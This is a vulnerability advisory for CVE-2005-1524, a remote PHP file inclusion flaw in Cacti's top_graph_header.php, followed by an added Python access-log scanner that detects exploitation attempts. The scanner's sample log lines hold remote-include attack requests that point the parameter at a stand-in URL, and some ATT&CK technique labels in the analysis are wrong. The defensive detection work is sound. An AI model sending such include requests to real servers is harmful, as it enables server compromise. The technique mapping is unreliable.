CVE-2005-1524 in Cacti
Summary
by MITRE
PHP file inclusion vulnerability in top_graph_header.php in Cacti 0.8.6d and possibly earlier versions allows remote attackers to execute arbitrary PHP code via the config[library_path] parameter.
Analysis
by VulDB Data Team • 11/22/2025
CVE-2005-1524 is a critical remote code execution flaw in the Cacti network monitoring system, version 0.8.6d and potentially earlier releases. The flaw resides in top_graph_header.php, which serves as a critical component of the application's web interface. It is a PHP file inclusion vulnerability: the application fails to properly validate or sanitize user-supplied input parameters before using them in file inclusion operations. The config[library_path] parameter is the attack vector. By injecting an arbitrary file path into it, an attacker can make the application include a file that resolves to executable PHP code.
This vulnerability operates under the Common Weakness Enumeration classification of CWE-98, which describes improper file inclusion vulnerabilities where applications include files based on user-supplied input without proper validation. The attack scenario involves an attacker sending a specially crafted HTTP request containing malicious content within the config[library_path] parameter. When the vulnerable Cacti application processes this parameter, it incorporates the specified path into a file inclusion directive, effectively executing any PHP code present in the targeted file. This flaw essentially provides attackers with a direct pathway to execute arbitrary commands on the server hosting the Cacti application, potentially leading to complete system compromise.
The operational impact of this vulnerability extends beyond simple code execution to encompass a comprehensive attack surface that aligns with several MITRE ATT&CK framework techniques including T1059 for command and script injection, T1566 for spearphishing with social engineering, and T1190 for exploit for client execution. Organizations running affected Cacti versions face significant risks including unauthorized access to network monitoring data, potential data exfiltration, server compromise, and the ability to establish persistent backdoors. The vulnerability is particularly dangerous because it allows remote attackers to execute code without requiring authentication, making it an attractive target for automated exploitation campaigns. Network administrators responsible for maintaining Cacti installations may find their monitoring infrastructure compromised, leading to potential blind spots in network security monitoring and the loss of critical infrastructure visibility.
Mitigation strategies for CVE-2005-1524 should focus on immediate patching of affected Cacti versions to the latest available releases that contain proper input validation and sanitization measures. Organizations should implement network segmentation and access controls to limit exposure of Cacti applications to untrusted networks while ensuring that all web application inputs undergo rigorous validation before processing. Additionally, deploying web application firewalls and implementing proper input sanitization practices can provide defense-in-depth measures against similar vulnerabilities. The vulnerability demonstrates the critical importance of proper parameter validation in web applications and serves as a reminder of the potential consequences when applications fail to validate user input before using it in dynamic file operations. Security monitoring should include detection of suspicious file inclusion patterns and unusual network activity that may indicate exploitation attempts.
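As a concrete form of the detection recommended above, the following added example (not part of the original advisory and not Cacti code) scans web server access-log lines for requests that set config[library_path] on top_graph_header.php, including percent-encoded and double-encoded spellings of the parameter name. The log lines, client addresses, URL prefix and verdict labels are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

SCRIPT = "top_graph_header.php"  # script named in the advisory
PARAM = re.compile(r"^config\[\s*['\"]?library_path['\"]?\s*\]", re.I)
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
URL_LIKE = re.compile(r"^(?:[a-z][a-z0-9+.-]*:)?//", re.I)

def decode_fully(value, rounds=3):
    """Undo nested percent-encoding, e.g. %255B -> %5B -> [."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(log_line):
    """Return None, or (verdict, decoded value) if the request sets the parameter."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not decode_fully(url.path).lower().endswith("/" + SCRIPT):
        return None
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if PARAM.match(decode_fully(key)):
            value = decode_fully(value)
            # A URL-like value points the include at a remote file; anything
            # else is still an attempt to override server-side configuration.
            return ("remote-include" if URL_LIKE.match(value) else "override", value)
    return None

# Constructed sample lines (combined log format); hosts and URL prefix are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2025:10:00:00 +0000] "GET /monitor/index.php HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jan/2025:10:00:01 +0000] "GET /monitor/top_graph_header.php HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Jan/2025:10:02:13 +0000] "GET /monitor/top_graph_header.php?config[library_path]=http://files.example.invalid/x HTTP/1.0" 200 64',
    '198.51.100.7 - - [01/Jan/2025:10:02:20 +0000] "GET /monitor/top_graph_header.php?config%255Blibrary_path%255D=/tmp HTTP/1.0" 200 64',
]

def scan(lines):
    """Return (line number, verdict, value) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        result = classify(line)
        if result:
            hits.append((n, *result))
    return hits
```

Calling scan(SAMPLE_LOG) flags the third and fourth lines. Access logs record only the query string, so a parameter sent in a request body would need inspection at a web application firewall or in the application itself.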